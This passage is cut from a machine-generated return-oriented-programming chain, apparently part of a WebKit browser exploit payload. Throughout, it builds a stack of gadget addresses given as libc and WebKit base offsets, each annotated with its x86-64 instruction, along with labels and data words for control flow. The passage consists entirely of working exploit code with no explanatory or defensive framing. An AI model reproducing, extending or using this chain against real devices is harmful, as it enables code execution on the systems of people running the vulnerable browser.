libc_base+764760, //pop rsi ropchain+506944, //L11070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+506928, //L11069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11068: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11069: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11070: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+507080, //L11073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+507112, //L11075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+507064, //L11072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11072: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11073: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11075: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+507224, //L11076+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+507216, //L11076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11076: db([0, 0]); // 0x0 set_gadgets([ ropchain+507240, //L11076+24 ropchain+510168, //L11071 libc_base+764760, //pop rsi ropchain+507280, //L11077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11077: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11079: db([4294967204, 4294967295]); // -0x5c set_gadgets([ 
libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+507400, //L11082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+507384, //L11080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11080: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11082: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+507576, //L11085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+507592, //L11086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+507544, //L11083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+507560, //L11084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11083: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11084: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11085: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11086: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+507752, //L11090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+507720, //L11088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+507736, //L11089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11087: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11088: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11089: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11090: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+507856, //L11092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+507840, //L11091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11091: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11092: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+507936, //L11093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11093: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11095: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+508056, //L11098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+508040, //L11096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11096: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11098: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+508232, //L11101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+508248, //L11102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+508200, //L11099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+508216, //L11100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11099: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 
//L11100: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11101: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11102: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+508408, //L11106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+508376, //L11104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+508392, //L11105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11103: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11104: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11105: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11106: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+508496, //L11107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+508512, //L11108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11107: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11108: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+508688, //L11110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+508704, //L11111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+508672, //L11109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+3236123 //pop r9 ]); //L11109: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11110: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11111: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+508816, //L11113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+508864, //L11116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+508832, //L11114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11113: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11114: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11115: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11116: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+508976, //L11117+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+508968, //L11117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11117: db([0, 0]); // 0x0 set_gadgets([ ropchain+508992, //L11117+24 ropchain+509464, //L11112 libc_base+764760, //pop rsi ropchain+509032, //L11118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11118: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11120: db([4294967204, 4294967295]); // -0x5c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+509152, //L11123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+509136, //L11121 webkit_base+660161, //mov [rsi], rax ; mov al, 
1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11121: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11123: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+509328, //L11126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+509344, //L11127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+509296, //L11124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+509312, //L11125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11124: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11125: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11126: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11127: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+509440, //L11130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+509424, //L11129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11129: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11130: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+509920, //L11128 //L11112: libc_base+764760, //pop rsi ropchain+509504, //L11131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11131: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11133: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+509624, //L11136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+509608, //L11134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11134: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11136: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+509800, //L11139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+509816, //L11140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+509768, //L11137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+509784, //L11138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11137: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11138: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11139: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11140: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+509912, //L11142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+509896, //L11141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11141: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11142: db([0, 0]); // 0x0 //L11128: set_gadgets([ libc_base+764760, //pop rsi ropchain+510016, //L11145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+510000, //L11144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11143: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11144: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11145: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, 
//shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+510080, //L11146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11148: db([4294967204, 4294967295]); // -0x5c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+510160, //L11149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11149: db([0, 0]); // 0x0 //L11071: set_gadgets([ libc_base+764760, //pop rsi ropchain+510208, //L11151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11151: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11153: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+510328, //L11156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+510312, //L11154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11154: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11156: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+510504, //L11159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+510520, //L11160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+510472, //L11157 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+510488, //L11158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11157: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L11158: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11159: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11160: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+510616, //L11162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+510600, //L11161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11161: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11162: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11163: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11164: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L11165: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+510816, //L11167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11167: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+510872, //L11168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11168: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi 
ropchain+511008, //L11172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+510992, //L11171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11170: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11172: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+511128, //L11175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+511096, //L11173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11173: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11174: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11175: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+511264, //L11177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+511280, //L11178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+511248, //L11176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11176: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11177: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11178: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+511392, //L11180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+511440, //L11183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+511408, //L11181 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11180: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11181: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11182: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11183: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+511552, //L11184+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+511544, //L11184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11184: db([0, 0]); // 0x0 set_gadgets([ ropchain+511568, //L11184+24 ropchain+515592, //L11179 //L11185: libc_base+764760, //pop rsi ropchain+511608, //L11186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11186: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11188: db([4294967204, 4294967295]); // -0x5c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+511728, //L11191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+511712, //L11189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11189: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11191: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+511904, //L11194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+511920, //L11195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+511872, //L11192 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+511888, //L11193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11192: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11193: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11194: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11195: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+512016, //L11197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+512000, //L11196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11196: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11197: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+512104, //L11199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11198: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11199: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+512160, //L11200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11200: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11202: db([4294967204, 4294967295]); // -0x5c set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+512240, //L11204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11204: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+512376, //L11207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+512360, //L11206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11205: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11207: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+512480, //L11209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+512464, //L11208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11208: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11209: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+512560, //L11210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11210: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11212: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+512680, //L11215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+512664, //L11213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11213: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11215: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+512856, //L11218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+512872, //L11219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+512824, //L11216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+512840, //L11217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11216: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11217: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11218: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11219: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+513032, //L11223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+513000, //L11221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+513016, //L11222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11220: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11221: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11222: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11223: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, 